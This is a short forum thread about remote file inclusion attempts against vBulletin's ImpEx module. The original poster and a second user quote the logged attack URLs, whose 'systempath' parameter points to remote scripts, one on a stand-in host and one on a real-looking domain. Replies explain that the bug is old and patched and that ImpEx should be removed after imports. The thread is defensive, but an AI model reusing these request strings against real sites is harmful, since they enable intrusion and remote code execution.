I had the following issue occur yesterday on my forum. From what it appears someone try to exploit the Impexdata module to include a file from a remote host.

The IP has been banned, but the path below was posted and a few png fiels from user were uploaded. These files were scanned and found be infected.

See below:

/forums/index.php/impex/ImpExData.php?systempath=http://www.example.com/images/saves.php.

Is this a hole that exists in the module, do I need to be concerned and what can I do to prevent this from happening in the future?

Thx

This bug is very old, and fixed several years ago.

ImpEx should always been removed from a system once the import is done and the latest version used for every consecutive import.

Ok, thanks, from what I read it was an old bug, but just wanted to verify.

thx

Ok, thanks, from what I read it was an old bug, but just wanted to verify.

thx

Always best :)

We just had some also, with a slight variation. Ours look like this:


..../ForumVB/index.php/impex/ImpExModule.php?systempath=http://www.henneferkanuteam.de/apboard/info.txt????

Still, that bug is 4 years old now.

Another good reminder to do and import, clean it up, finalise it and then remove ImpEx, as with the speed of updates there will likely be an updated version before you want to do another system import or merge.